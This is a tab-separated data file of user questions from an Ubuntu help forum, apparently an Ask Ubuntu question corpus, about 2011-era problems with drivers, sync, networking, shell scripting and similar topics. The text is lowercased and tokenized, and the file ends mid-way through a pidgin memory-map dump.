93401	how can i change/move the default folder that photos are uploaded to when using the ubuntu one files app for ios ?	i used ubuntu one files on my iphone and i enabled auto-upload camera roll feature . the app started uploading 500+ photos stored on my iphone 's camera roll , and it created a new folder titled `` pictures - iphone '' . later on , i fire up my ubuntu desktop and i see that ubuntu one was syncing and it created a new folder on my home directory titled `` pictures - iphone '' . the questions are : how is the correct way to move this folder into another folder ( e.g : pictures | pictures - iphone ) ? is it also possible to rename the folder ? what i meant by correct way above , is that i do not want to break the sync with ubuntu one files on my iphone - i do not want to upload 500+ photos again . thank you in advance for your answer .
93404	ati catalyst did n't update correctly and now ca n't boot	i recently bought a barebone with ubuntu 11.04 64 bits installed , which worked correctly except that the video worked a bit bad . so i tried downloading ati catalyst from ati web , and tried to install . as ubuntu asked me to uninstall first the old catalyst or force the intallation , i tried forcing , and then after rebooting , the system freezes and shows a failure saying automatic crash report generation . then i tried rebooting in safe mode , wich works correctly , and try to reinstall ati , but shows an error at installation . rebooting the system , it now show a black screen , and does nothing . please , i need help , as i am not a regular user of ubuntu , and now i cant use the pc .
93405	i think i found a bug but i do n't know how to report it	i have installed kubuntu 12.04 alpha 1 . i started software updates to update applications . all packages downloaded , but it started to install and it 's stuck at 39 % for about an half of hour right now . as i do n't have a crash report , if it 's possible , how can i report this bug ?
93411	simple & easy way to jail users	i need a simple and easy way to jail users in their home directories in oneiric . do you have a simple configuration for jailing users , with full help , or some good web links ? i would be offering an online free public server with 10 to 20 gb free space . i do n't know how many users . i want to give them ssh and sftp so that they can connect through filezilla .
93416	getting a delay with my internet ( however my speed and ping are normal )	i 've been having some delay issues with my internet connection . it 's hard to explain exactly what the issue is , but i can give a few examples . also it does this with or without my router connected . -if i try to go to any website , my browser will sit with the loading wheel seemingly doing nothing for about 10-30sec , then the page loads at full speed . -if i go to youtube , after about 10-30sec of staring at a white screen , everything except the video previews load , there still white squares ( but they do eventually load ) . then when i go to play a video , it takes between , 10-30sec for the video to start , but once it starts it almost immediately buffers all the way through at full speed . but , yep there 's more , about 10-20sec after the video starts it gets paused so the commercial can play ... the commercial that should have played before the video ever started . i have 20mb/s down , and 2mb/s up , during the day i actually get closer to 30mb/s down and 1.7mb/s up , then in the evening i get about 18mb/s down , and 1.5mb/s up . the only reason my ping test is a b is because it cant test packet loss because i do n't have java , i ran the ping test on a windows computer on the same network , and it was an a and packet loss was at 0 % . also ping -c 4 google.com ping google.com ( 74.125.45.105 ) 56 ( 84 ) bytes of data . 64 bytes from yx-in-f105.1e100.net ( 74.125.45.105 ) : icmp_req=1 ttl=51 time=33.3 ms 64 bytes from yx-in-f105.1e100.net ( 74.125.45.105 ) : icmp_req=2 ttl=51 time=27.5 ms 64 bytes from yx-in-f105.1e100.net ( 74.125.45.105 ) : icmp_req=3 ttl=51 time=29.1 ms 64 bytes from yx-in-f105.1e100.net ( 74.125.45.105 ) : icmp_req=4 ttl=51 time=29.4 ms -- - google.com ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3004ms rtt min/avg/max/mdev = 27.563/29.873/33.335/2.127 ms also , here is a link to a kubuntu user with what sounds like the exact same issue , unfortunately the work around mentioned in the tread did n't really help me . http : //kubuntuforums.net/forums/index.php ? topic=3106289.0 info : ubuntu 11.10 64bit asrock m3a770de mobo w/realtek rtl8111dl on board nic
93417	automated call distributor	i am trying to help push linux into a small business . proving to my boss that ubuntu is fully capable the only thing that i am missing is an acd phone system . wine is particularly difficult to work with and i can not get it to emulate our windows program at all . the system we use currently is oaisys phone system any help would be much appreciated .
93420	disabling the unity dash and dock in favor of cairo-dock and synapse	i have installed cairo-dock and synapse so i have no use at all for the unity dock and dash . what more is there to unity than that ? the top bar with the indicator applets i guess . i do n't mind it , but i would n't mind having another one either . can i disable the unity dash and dock ? or do i need to use a different desktop manager ? which one ? the lighter the better . possibly one that does nothing but display applets in the corner of the screen .
93425	deinterlace mythbuntu 0.24.1	mythbuntu 0.24.1 i do n't have a deinterlacing option like shown here : http : //www.mythtv.org/wiki/deinterlacing is it moved ? my picture is top & bottom . when paused , it looks correct . going through the cpu+ , cpu++ , etc , i can see the options ( and have tried many options ) , but no go . hauppauge hd pvr , cable box , newish cpu , onboard video . thanks for the help !
93427	is there a way to install multiple fonts on ubuntu without needing to do them one at a time ?	this has been itching at me for a while and it would be great to know if theres a way to do this because , i have lots of fonts ( ttf ) i want to install but dont wan na do it 1 at a time .
93434	`` type `ain` is not known '' error after installing and removing a ppa	i got following error while launching update center an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/gnome3-team-gnome3-oneiric.list , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened .
93438	dell with intel sandybridge and hd radeon 6470m	i got a new dell inspiron 15r and i made a fresh install of ubuntu 11.10 . the problem is that when i 'm using my computer , after 20 minutes or something , my screen starts to flash and flick a lot . it 's a lot annoying and even more when u are trying to programming some code ! : ) it gets worse when u use the trackpad , really have no idea why , but it gets a lot worse . so i have to use an usb mouse but it doesnt solve the problem at all . please anyone could help me out with that ? i 've searched a lot and i really dont know anymore what to do .
93445	what version of ubuntu can i run on an old desktop ?	what version of ubuntu can i run on an old desktop ? also , can i revert to old style navigation in 11.10 ? i have a p4 3ghz 1 gb ram 160 gb hdd graphics : vesa : 6330 i installed 11.10 , but it is slow .
93447	how do i get my lenovo t61 to connect to a wireless network ?	i have a lenovo thinkpad t61 and the wireless works just fine so i installed ubuntu straight away only to find that the wireless will not connect , it will see the networks but just not connect . has anyone managed to solve this all the forums seem to relate to ubuntu 9.04 and before . edit : sorry about that , i did n't realise that there were 2 models mine is the intel corporation pro/wireless 4965 ag or agn [ kedron ] network connection . any help is much appreciated .
93448	`xsetwacom -- list dev` is empty ( using doctormo 's wacom ppa ) and cursor position does n't update	xsetwacom -- list dev is empty on ubuntu 10.04 64-bit with doctormo 's wacom-plus ppa . the device otherwise appears to work fine and i can find the devices via brute force : for i in { 1..50 } ; do sudo xsetwacom -- get $ i all ; done but this still does n't tell me which device is which . update : not working fine actually . the cursor position does n't update after pressing down and then lifting . i have to move the stylus out of the range of detection ; the cursor moves again once i move it back in field . updated title .
93449	scheduled tasks application installed , it stoped working after one time	i have installed the gnome schedule ( scheduled tasks ) to automate the backup of the on ubuntu lucid computer . the scheduled tasks run for one time . i added one task and then next time it stoped running . now everytime i run the application , the icon appears for few seconds in task bar , and application stops . i tried reinstalling and rebooting computer many times but same thing happens . any solution to this problem ? i googled this problem for a long time . i could n't find the solution for this . i have found some comments on forum about running the application from terminal , so here it is the output of the warning when ran from terminal , gnome-schedule /usr/share/gnome-schedule/mainwindow.py:158 : deprecationwarning : use the new widget gtk.tooltip tip = gtk.tooltips ( ) /usr/share/gnome-schedule/mainwindow.py:159 : deprecationwarning : use the new widget gtk.tooltip tip.enable ( ) traceback ( most recent call last ) : file `` /usr/share/gnome-schedule/gnome-schedule.py '' , line 74 , in < module > mainwindow = mainwindow.main ( debug_flag , false , pr , manual_poscorrect ) file `` /usr/share/gnome-schedule/mainwindow.py '' , line 257 , in __init__ self.schedule_reload ( ) file `` /usr/share/gnome-schedule/mainwindow.py '' , line 308 , in schedule_reload data = self.at.read ( ) file `` /usr/share/gnome-schedule/at.py '' , line 514 , in read array_or_false = self.parse ( line ) file `` /usr/share/gnome-schedule/at.py '' , line 174 , in parse if script [ -1 ] == `` \n '' : indexerror : string index out of range update : found similar post somewhere online here . i just do n't get it , how that worked for that person in that post .
93450	unity freezing on login . how to reset ?	upgrade from 11.04 to 11.10 failed . reinstalled 11.10 without formatting . appears that config files in /home are breaking unity ( because it runs fine from a live cd ) . can not run 'unity -- reset ' as the graphics corrupt , the mouse freezes and it appears the keyboard is frozen as well . how can i repair this from recovery mode ?
93457	how do i enable or disable apport ?	the system crash dialog is annoying me , how can i turn it off ? i 'd also like to know how to turn it back on just in case i need it to report a problem .
93458	ubuntu one does not work in windows 7 russian edition	the program is not working section `` folder '' . when trying to add a new directory or porluchayu error : sorry , an error has occurred and ubuntu one need to close . detailed information on the error contains : unicodedecodeerror 'ascii' 'c : \ \ users \ \ \ xc5 \ xe2 \ xe3 \ xe5 \ xed \ xe8 \ xe9 \ xcc \ xe0 \ xeb \ xfc \ xf6 \ xe5 \ xe2 \ \' 9 10 'ordinal not in range ( 128 ) ' the name of the user in the system is set to russian and the path to the profile also contains russian characters . what to do ? , p.s . ubuntu one version 2.0.3 for windows , windows 7 profissional 64bit russian edition sp1
93459	how to exit recovery console ?	i upgraded my ubuntu to 11.10 two days ago and by accident i started on recovery console mode and now i can not get out of it . i tried reboot and enter and it said : need to be root . how can i start it normally again ? i have no experience with commands and stuff . thank you .
93461	autofill ( with incrementing row-number ) in spreadsheet programs does n't work as expected	i have two rows with values and third row must be a difference between first and second row , like here : 3 5 1 . . 2 2 5 . . 1 3 -4 . . i enter a formula in the 3rd row 2nd column : = $ b3- $ b4 i enter a formula in the 3rd row 3rd column : = $ c3- $ c4 and then i ( as used in ms excel ) select 2 and 3 columns in 3rd row and grab the dot in the bottom right corner , then i pulling it to the right to extend for some columns . as a result i want to see = $ d3- $ d4 and = $ e3- $ e4 but i see only repeating = $ b3- $ b4 , = $ c3- $ c4 , = $ b3- $ b4 , = $ c3- $ c4 , = $ b3- $ b4 , = $ c3- $ c4 . tried this in libreoffice calc and gnumeric . versions : libreoffice 3.3.4 ooo330m19 ( build:401 ) tag libreoffice-3.3.3.1 , ubuntu package 1:3.3.4-0ubuntu1 gnumeric : 1.10.13
93468	sharing video on ubuntu	i am brand new to ubuntu . i want to have my daughter-in-law share videos of our first grandson . can you send me instructions on how to have her upload videos so we can watch them ? thank you .
93469	how do i create a remote location ?	so here is my deal . i 'm thinking about using bluefish to do remote file editing ( php , html , js etc ) on our webserver . this is pretty easy with a program like dreamweaver that has ftp capability built in but i do n't see a program that can do this on linux ( at least not one that is freely available ) . so i was thinking that i could create a remote location in ubuntu and then hopefully the remote directory would appear in the bluefish navigation area . what do you guys think ?
93471	upgrade option grayed out in intaller	i 'm running ubuntu 10.10 on a gigabyte ga-81915g-mf motherboard with a pentium 4 2.6gb cpu , 1gb ram and 160gb hd . i 'm quite happy with this and prefer it over my microsoft computer which i only use for the odd program not available in a linux version . i decided to upgrade to 11.10 since i 've gotten to like unity which i use on my eeepc with 10.04 . i purchased the latest issue of ubuntu user with 11.10 on the dvd ( to save on download allowance ) , checked the integrity of the disc and proceeded to install . all seemed to go fine until i went to choose the upgrade option on the menu , and the menu would not allow me to choose it . for some weird reason it would skip over it to the next option . i 'd never come across this before , and there was no explanation . i tried several times and even approached it from the live version as well as the boot option . but no luck .
93475	temperature sensors does n't show two of my cores	i installed sensors , but this do n't show me the 4 temperatures of my 4 cores , i have a intel core i5 , adapter : virtual device temp1 : +26.8°c ( crit = +100.0°c ) temp2 : +0.0°c ( crit = +100.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +40.0°c ( high = +95.0°c , crit = +105.0°c ) core 2 : +47.0°c ( high = +95.0°c , crit = +105.0°c ) i followed the same procedure in other i5 machine , and sensors show me the 4 temperatures of the 4 cores , i installed : apt-get install lm-sensors , apt-get install hddtemp , sensors-detect , modprobe coretemp ( in my case ) . why i ca n't see the other 2 cores ' temperatures what is temp1 , temp2 , coretemp-isa-0000 , adapter : isa adapter i saw in other forums that sensors show a lot of temperatures , how i can do that ? , what other program i have to install ?
93479	how does the kernel detect hardware and load device drivers during boot up ?	recently i am playing with android x86 ( http : //www.android-x86.org/ ) . from what i know , the android kernel is very similar to ubuntu linux kernel . however , according to this discussion , android is designed for specific platform and it has removed common hardware auto detection like those in ubuntu . i would like to learn how ubuntu kernel detects hardware and load device drivers during boot up . i have been googling for a long time . so far , one of the best article about linux boot up process is this . however , this article is missing some important details i want : after bootloader loads kernel and initrd into ram , how the kernel detects hardware and loads device drivers ? i have seen some people talking about udev , but i do n't know how it works during linux boot up . can anyone explain how ubuntu kernel detect hardware and load device drivers during boot up ? thanks . ( if you can give me the links to the hardware detection script used by ubuntu it will be great ! )
93480	using a mac osx *.keyboard layout specification on ubuntu 11.10	i have recieved from a friend a custom-made keyboard layout , designed ( as he puts it ) to be a `` programmer-friendly port of a combination of the two most common swedish variants of the dvorak keyboard layout '' . he is using mac osx , so he just zipped the contents of his ~/library/keyboardlayouts and sent it to me . of course , the files do n't seem portable to ubuntu without modification - at least i do n't understand how ... among the files , the file that seems to do the actual work is a file called svorak.keyboard , which in fact is an xml file defining the keyboard layout . the first section of the file is shown below : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype keyboard system `` file : //localhost/system/library/dtds/keyboard.dtd '' > < keyboard group= '' 0 '' id= '' 0 '' name= '' svorak '' maxout= '' 2 '' > < layouts > < layout first= '' 0 '' last= '' 0 '' modifiers= '' 28 '' mapset= '' a0 '' / > < /layouts > < modifiermap id= '' 28 '' defaultindex= '' 7 '' > < keymapselect mapindex= '' 0 '' > < modifier keys= '' command ? `` / > < modifier keys= '' anyshift command caps ? `` / > < /keymapselect > < keymapselect mapindex= '' 1 '' > < modifier keys= '' anyshift caps ? `` / > < /keymapselect > ... < /modifiermap > < keymapset id= '' a0 '' > < keymap index= '' 0 '' > < key code= '' 0 '' action= '' 8 '' / > < key code= '' 1 '' action= '' o '' / > < key code= '' 2 '' action= '' e '' / > ... is there any ( easy ) way i can take this layout and re-map it into a standard ubuntu format ? i 'd like to install it alongside my regular qwerty layout , so i can switch between them using the applet in the status bar etc - in other words , i want to install it as any other installed keyboard layout in ubuntu . is that possible ? how ?
93482	problem when trying to run script	есть проблема на ubuntu 11.10 , при запуске sh скриптов , без активной консоли , команда who не отображает активных пользователей , а в скрипте необходимо знать , какой пользователь активен сейчас . кто нибудь сталкивался ? ( google translate 's courtesy ) there is a problem on ubuntu 11.10 , when you run the sh script , without the active console , the team who does not show active users , but the script needs to know which user is active right now . who ever came across ? by the way acpi package has a bug related to my problem , its script is also used by the command who . $ dpkg -l | grep acpi | awk ' { print $ 2 `` _ '' $ 3 } ' acpi_1.5-3ubuntu1 acpi-support_0.138 acpid_1:2.0.10-1ubuntu2.3 $ grep who /usr/share/acpi-support/* /usr/share/acpi-support/power-funcs : user= $ ( who | awk `` / : $ displaynum ) / { print \ $ 1 ; exit } '' ) /usr/share/acpi-support/power-funcs : user= $ ( who | awk `` / : $ displaynum/ { print \ $ 1 ; exit } '' ) i think this can be fixed : user= $ ( users | sed 's | |\n|g ' | uniq ) ____ updated 12.01.2012 the problem is not solved ! small amusing experiment : for the test with who and user commands , i run the terminal , and add the following lines to /etc/crontab : * * * * * root echo 'who : '`who` > > /123 * * * * * root echo 'users : '`users` > > /123 * * * * * root echo 'users /var/run/utmp : '`users /var/run/utmp` > > /123 * * * * * root echo 'users /var/log/wtmp : '`users /var/log/wtmp` > > /123 and check the /123 file when terminal is running : users /var/log/wtmp : administrator administrator ... who : administrator pts/3 2012-01-12 14:59 ( :0.0 ) users : administrator users /var/run/utmp : administrator when terminal is closed : who : users : users /var/run/utmp : users /var/log/wtmp : administrator administrator ... again , the question of how to get a list of users logged on to the system ( x session ) , from the console as root . until i see only one solution : user= $ ( users /var/log/wtmp | sed 's| |\n|g ' | uniq ) ` who knows a more elegant solution ? or is this just an option ? or maybe it 's still a bug ?
93484	subshell ls -lh `` $ ( find /music -type d ) '' does n't return list , instead results of find command	i 'm trying to list the details of all the directories in my music folder using the following command : ls -lh `` $ ( find /music -type d ) '' however all i get is the return of the find command . is this syntax correct ? i 'm using ubuntu server 10.04 . i think i remember a few weeks ago trying this on gui ubuntu 10.04 and it seemed to output the details of the ls command
93490	parental control in ubuntu 11.10	i am using ubuntu 11.10 on my desktop computer along with windows 7.i need help in finding a working parental control for ubuntu 11.10.i searched the web and found gnome nanny , but it does not work .
93495	what is the uid ( user id ) & gid ( group id ) that samba service using ?	what is the default uid ( user in ) and gid ( group id ) that samba service using ? for an example , apache2 runs as www-data , likewise what is the uid that samba service using ?
93499	assign standard exit status to a makefile variable	i 'm trying to save the standard exit status of a command in a variable of my makefile , but i do n't know how to do it . i 've tried this : pruebas : @ a= $ ( ls ) ... but it does n't work .
93504	remove third party software	i 've just installed ubuntu 11.10 but having some problems 1.ca n't able to view installed software 2.ca n't able to install new software 3.ca n't able to remove third party software so what can i do to fix this problem ?
93509	how to interpret /proc/pid/maps for pidgin application	08048000-08109000 r-xp 00000000 08:01 8610955 /usr/bin/pidgin 08109000-0810c000 rw-p 000c1000 08:01 8610955 /usr/bin/pidgin 09686000-09f4c000 rw-p 09686000 00:00 0 [ heap ] b46b7000-b46b9000 r-xp 00000000 08:01 10316414 /usr/lib/gconv/cp1250.so b46b9000-b46ba000 r -- p 00001000 08:01 10316414 /usr/lib/gconv/cp1250.so b46ba000-b46bb000 rw-p 00002000 08:01 10316414 /usr/lib/gconv/cp1250.so b46bb000-b4703000 rw-p b46bb000 00:00 0 b4703000-b5152000 r -- p 00000000 08:01 10855144 /usr/share/fonts/ttf/wqy-zenhei.ttf b5152000-b58a8000 r -- p 00000000 08:01 10858251 /usr/share/fonts/ttf/sazanami-gothic.ttf b58a8000-b58aa000 r-xp 00000000 08:01 10707102 /usr/lib/pango/1.6.0/modules/pango-hangul-fc.so b58aa000-b58ab000 rw-p 00001000 08:01 10707102 /usr/lib/pango/1.6.0/modules/pango-hangul-fc.so b58ab000-b58ad000 r-xp 00000000 08:01 10707101 /usr/lib/pango/1.6.0/modules/pango-arabic-fc.so b58ad000-b58ae000 rw-p 00001000 08:01 10707101 /usr/lib/pango/1.6.0/modules/pango-arabic-fc.so b58ae000-b58af000 r-xp 00000000 08:01 10707100 /usr/lib/pango/1.6.0/modules/pango-arabic-lang.so b58af000-b58b0000 rw-p 00000000 08:01 10707100 /usr/lib/pango/1.6.0/modules/pango-arabic-lang.so b58b0000-b58e7000 r -- p 00000000 08:01 10314811 /usr/share/icons/hicolor/icon-theme.cache b58e7000-b5947000 rw-s 00000000 00:08 131073 /sysv00000000 ( deleted ) b5947000-b5f5f000 rw-p b5947000 00:00 0 b5f5f000-b5feb000 r -- p 00000000 08:01 10856177 /usr/share/fonts/ttf/dejavusans-bold.ttf b5feb000-b6603000 rw-p b5feb000 00:00 0 b6603000-b669b000 r -- p 00000000 08:01 10856178 /usr/share/fonts/ttf/dejavusans.ttf b669b000-b66ab000 r -- s 00000000 08:01 11397515 /var/cache/fontconfig/8d4af663993b81a124ee82e610bb31f9-x86.cache-2 b66ab000-b66b5000 r -- s 00000000 08:01 11395119 /var/cache/fontconfig/d62e99ef547d1d24cdb1bd22ec1a2976-x86.cache-2 b66b5000-b66cd000 r -- s 00000000 08:01 11397344 /var/cache/fontconfig/f6b893a7224233d96cb72fd88691c0b4-x86.cache-2 b66cd000-b66d2000 r -- s 00000000 08:01 11395090 /var/cache/fontconfig/f349e9996a5320f6dd491cedd2b1f964-x86.cache-2 b66d2000-b66e5000 r-xp 00000000 08:01 10913299 /usr/lib/purple-2/libzephyr.so b66e5000-b66e7000 rw-p 00012000 08:01 10913299 /usr/lib/purple-2/libzephyr.so b66e7000-b66e9000 rw-p b66e7000 00:00 0 b66e9000-b6713000 r-xp 00000000 08:01 10913344 /usr/lib/purple-2/libqq.so b6713000-b6714000 rw-p 0002a000 08:01 10913344 /usr/lib/purple-2/libqq.so b6714000-b6779000 r-xp 00000000 08:01 8512393 /usr/lib/libgcrypt.so.11.4.3 b6779000-b677b000 rw-p 00065000 08:01 8512393 /usr/lib/libgcrypt.so.11.4.3 b677b000-b6816000 r-xp 00000000 08:01 8511792 /usr/lib/libgnutls.so.26.11.3 b6816000-b681c000 rw-p 0009b000 08:01 8511792 /usr/lib/libgnutls.so.26.11.3 b681c000-b681e000 r-xp 00000000 08:01 10707103 /usr/lib/pango/1.6.0/modules/pango-basic-fc.so b681e000-b681f000 rw-p 00001000 08:01 10707103 /usr/lib/pango/1.6.0/modules/pango-basic-fc.so b681f000-b6830000 r-xp 00000000 08:01 10675625 /usr/lib/gtk-2.0/2.10.0/engines/libubuntulooks.so b6830000-b6831000 rw-p 00011000 08:01 10675625 /usr/lib/gtk-2.0/2.10.0/engines/libubuntulooks.so b6831000-b6992000 r-xp 00000000 08:01 10913301 /usr/lib/purple-2/perl.so b6992000-b6994000 rw-p 00161000 08:01 10913301 /usr/lib/purple-2/perl.so b6994000-b69a5000 r-xp 00000000 08:01 8512535 /usr/lib/libxft.so.2.1.13 b69a5000-b69a6000 rw-p 00010000 08:01 8512535 /usr/lib/libxft.so.2.1.13 b69a6000-b6aa1000 r-xp 00000000 08:01 8512492 /usr/lib/libtk8.5.so b6aa1000-b6ab2000 rw-p 000fa000 08:01 8512492 /usr/lib/libtk8.5.so b6ab2000-b6b9d000 r-xp 00000000 08:01 8513009 /usr/lib/libtcl8.5.so b6b9d000-b6ba3000 rw-p 000eb000 08:01 8513009 /usr/lib/libtcl8.5.so b6ba3000-b6ba7000 r-xp 00000000 08:01 10674979 /usr/lib/gtk-2.0/2.10.0/loaders/libpixbufloader-png.so b6ba7000-b6ba8000 rw-p 00003000 08:01 10674979 /usr/lib/gtk-2.0/2.10.0/loaders/libpixbufloader-png.so b6ba8000-b6baa000 r-xp 00000000 08:01 10913349 /usr/lib/purple-2/statenotify.so b6baa000-b6bab000 rw-p 00001000 08:01 10913349 /usr/lib/purple-2/statenotify.so b6bab000-b6bae000 r-xp 00000000 08:01 8512398 /usr/lib/libgpg-error.so.0.4.0 b6bae000-b6baf000 rw-p 00002000 08:01 8512398 /usr/lib/libgpg-error.so.0.4.0 b6baf000-b6bb3000 r-xp 00000000 08:01 10913357 /usr/lib/purple-2/ssl-gnutls.so b6bb3000-b6bb4000 rw-p 00003000 08:01 10913357 /usr/lib/purple-2/ssl-gnutls.so b6bb4000-b6bb5000 r-xp 00000000 08:01 10913354 /usr/lib/purple-2/libaim.so b6bb5000-b6bb6000 rw-p 00001000 08:01 10913354 /usr/lib/purple-2/libaim.so b6bb6000-b6bb7000 r-xp 00000000 08:01 10913296 /usr/lib/purple-2/ssl.so b6bb7000-b6bb8000 rw-p 00000000 08:01 10913296 /usr/lib/purple-2/ssl.so b6bb8000-b6bc5000 r-xp 00000000 08:01 10913300 /usr/lib/purple-2/tcl.so b6bc5000-b6bc6000 rw-p 0000d000 08:01 10913300 /usr/lib/purple-2/tcl.so b6bc6000-b6bc7000 r-xp 00000000 08:01 10913341 /usr/lib/purple-2/buddynote.so b6bc7000-b6bc8000 rw-p 00000000 08:01 10913341 /usr/lib/purple-2/buddynote.so b6bc8000-b6be0000 r-xp 00000000 08:01 10913262 /usr/lib/purple-2/libnovell.so b6be0000-b6be1000 rw-p 00018000 08:01 10913262 /usr/lib/purple-2/libnovell.so b6be1000-b6be2000 r-xp 00000000 08:01 10913352 /usr/lib/purple-2/newline.so b6be2000-b6be3000 rw-p 00000000 08:01 10913352 /usr/lib/purple-2/newline.so b6be3000-b6be5000 r-xp 00000000 08:01 10913353 /usr/lib/purple-2/autoaccept.so b6be5000-b6be6000 rw-p 00002000 08:01 10913353 /usr/lib/purple-2/autoaccept.so b6be6000-b6c23000 r-xp 00000000 08:01 10913342 /usr/lib/purple-2/libmsn.so b6c23000-b6c24000 rw-p 0003d000 08:01 10913342 /usr/lib/purple-2/libmsn.so b6c24000-b6c28000 rw-p b6c24000 00:00 0 b6c28000-b6c30000 r-xp 00000000 08:01 10913298 /usr/lib/purple-2/log_reader.so b6c30000-b6c31000 rw-p 00008000 08:01 10913298 /usr/lib/purple-2/log_reader.so b6c31000-b6c4e000 r-xp 00000000 08:01 10913356 /usr/lib/purple-2/libgg.so b6c4e000-b6c4f000 rw-p 0001d000 08:01 10913356 /usr/lib/purple-2/libgg.so b6c4f000-b6c61000 r-xp 00000000 08:01 10913297 /usr/lib/purple-2/libirc.so b6c61000-b6c62000 rw-p 00012000 08:01 10913297 /usr/lib/purple-2/libirc.so b6c62000-b6c77000 r-xp 00000000 08:01 10913347 /usr/lib/purple-2/libmyspace.so b6c77000-b6c78000 rw-p 00014000 08:01 10913347 /usr/lib/purple-2/libmyspace.so b6c78000-b6c79000 rw-p b6c78000 00:00 0 b6c79000-b6cb6000 r-xp 00000000 08:01 10913292 /usr/lib/purple-2/liboscar.so.0.0.0 b6cb6000-b6cb8000 rw-p 0003c000 08:01 10913292 /usr/lib/purple-2/liboscar.so.0.0.0 b6cb8000-b6ddd000 r-xp 00000000 08:01 8512891 /usr/lib/libcrypto.so.0.9.8 b6ddd000-b6df2000 rw-p 00125000 08:01 8512891 /usr/lib/libcrypto.so.0.9.8 b6df2000-b6df5000 rw-p b6df2000 00:00 0 ( ... ) b71fd000-b71fe000 rw-p b71fd000 00:00 0 b71fe000-b7232000 r-xp 00000000 08:01 8512910 /usr/lib/libpixman-1.so.0.12.0 b7232000-b7233000 rw-p 00034000 08:01 8512910 /usr/lib/libpixman-1.so.0.12.0 b7233000-b726d000 r-xp 00000000 08:01 8512644 /usr/lib/libpng12.so.0.1.2.32 b726d000-b726e000 rw-p 0003a000 08:01 8512644 /usr/lib/libpng12.so.0.1.2.32 b726e000-b72da000 r-xp 00000000 08:01 10307580 /usr/lib/libfreetype.so.6.3.18 b72da000-b72de000 rw-p 0006c000 08:01 10307580 /usr/lib/libfreetype.so.6.3.18 b72de000-b7304000 r-xp 00000000 08:01 8512896 /usr/lib/libpangoft2-1.0.so.0.2002.3 b7304000-b7305000 rw-p 00026000 08:01 8512896 /usr/lib/libpangoft2-1.0.so.0.2002.3 b7305000-b7306000 rw-p b7305000 00:00 0 b7306000-b730e000 r-xp 00000000 08:01 8512574 /usr/lib/libxcursor.so.1.0.2 b730e000-b730f000 rw-p 00007000 08:01 8512574 /usr/lib/libxcursor.so.1.0.2 b730f000-b7314000 r-xp 00000000 08:01 8512539 /usr/lib/libxrandr.so.2.1.0 b7314000-b7315000 rw-p 00004000 08:01 8512539 /usr/lib/libxrandr.so.2.1.0 b7315000-b731c000 r-xp 00000000 08:01 8512610 /usr/lib/libxi.so.6.0.0 b731c000-b731d000 rw-p 00006000 08:01 8512610 /usr/lib/libxi.so.6.0.0 b731d000-b731f000 r-xp 00000000 08:01 8512615 /usr/lib/libxinerama.so.1.0.0 b731f000-b7320000 rw-p 00001000 08:01 8512615 /usr/lib/libxinerama.so.1.0.0 b7320000-b7327000 r-xp 00000000 08:01 8512646 /usr/lib/libxrender.so.1.3.0 b7327000-b7328000 rw-p 00006000 08:01 8512646 /usr/lib/libxrender.so.1.3.0 b7328000-b7329000 rw-p b7328000 00:00 0 b7329000-b7351000 r-xp 00000000 08:01 10307575 /usr/lib/libfontconfig.so.1.3.0 b7351000-b7352000 rw-p 00028000 08:01 10307575 /usr/lib/libfontconfig.so.1.3.0 b7352000-b7356000 r-xp 00000000 08:01 8512594 /usr/lib/libxfixes.so.3.1.0 b7356000-b7357000 rw-p 00003000 08:01 8512594 /usr/lib/libxfixes.so.3.1.0 b7357000-b7359000 r-xp 00000000 08:01 8512578 /usr/lib/libxdamage.so.1.1.0 b7359000-b735a000 rw-p 00001000 08:01 8512578 /usr/lib/libxdamage.so.1.1.0 b735a000-b735c000 r-xp 00000000 08:01 8512571 /usr/lib/libxcomposite.so.1.0.0 b735c000-b735d000 rw-p 00001000 08:01 8512571 /usr/lib/libxcomposite.so.1.0.0 b735d000-b7370000 r-xp 00000000 08:01 10305617 /usr/lib/libz.so.1.2.3 b7370000-b7371000 rw-p 00012000 08:01 10305617 /usr/lib/libz.so.1.2.3 b7371000-b7372000 rw-p b7371000 00:00 0 b7372000-b737a000 r-xp 00000000 08:01 8512486 /usr/lib/libenchant.so.1.4.2 b737a000-b737b000 rw-p 00008000 08:01 8512486 /usr/lib/libenchant.so.1.4.2 b737b000-b737d000 r-xp 00000000 08:01 8512388 /usr/lib/libxau.so.6.0.0 b737d000-b737e000 rw-p 00001000 08:01 8512388 /usr/lib/libxau.so.6.0.0 b737e000-b7394000 r-xp 00000000 08:01 8512748 /usr/lib/libxcb.so.1.0.0 b7394000-b7395000 rw-p 00015000 08:01 8512748 /usr/lib/libxcb.so.1.0.0 b7395000-b7396000 r-xp 00000000 08:01 8512754 /usr/lib/libxcb-xlib.so.0.0.0 b7396000-b7397000 rw-p 00000000 08:01 8512754 /usr/lib/libxcb-xlib.so.0.0.0 b7397000-b73bb000 r-xp 00000000 08:01 7947610 /lib/libm-2.7.so b73bb000-b73bc000 r -- p 00023000 08:01 7947610 /lib/libm-2.7.so b73bc000-b73bd000 rw-p 00024000 08:01 7947610 /lib/libm-2.7.so b73bd000-b73be000 rw-p b73bd000 00:00 0 b73be000-b7503000 r-xp 00000000 08:01 7947648 /lib/libc-2.7.so b7503000-b7504000 -- -p 00145000 08:01 7947648 /lib/libc-2.7.so b7504000-b7506000 r -- p 00145000 08:01 7947648 /lib/libc-2.7.so b7506000-b7507000 rw-p 00147000 08:01 7947648 /lib/libc-2.7.so b7507000-b750a000 rw-p b7507000 00:00 0 b750a000-b7519000 r-xp 00000000 08:01 7947617 /lib/libresolv-2.7.so b7519000-b751a000 r -- p 0000f000 08:01 7947617 /lib/libresolv-2.7.so b751a000-b751b000 rw-p 00010000 08:01 7947617 /lib/libresolv-2.7.so b751b000-b751d000 rw-p b751b000 00:00 0 b751d000-b7531000 r-xp 00000000 08:01 7947650 /lib/libnsl-2.7.so b7531000-b7532000 r -- p 00013000 08:01 7947650 /lib/libnsl-2.7.so b7532000-b7533000 rw-p 00014000 08:01 7947650 /lib/libnsl-2.7.so b7533000-b7535000 rw-p b7533000 00:00 0 b7535000-b7548000 r-xp 00000000 08:01 7947616 /lib/libpthread-2.7.so b7548000-b7549000 r -- p 00012000 08:01 7947616 /lib/libpthread-2.7.so b7549000-b754a000 rw-p 00013000 08:01 7947616 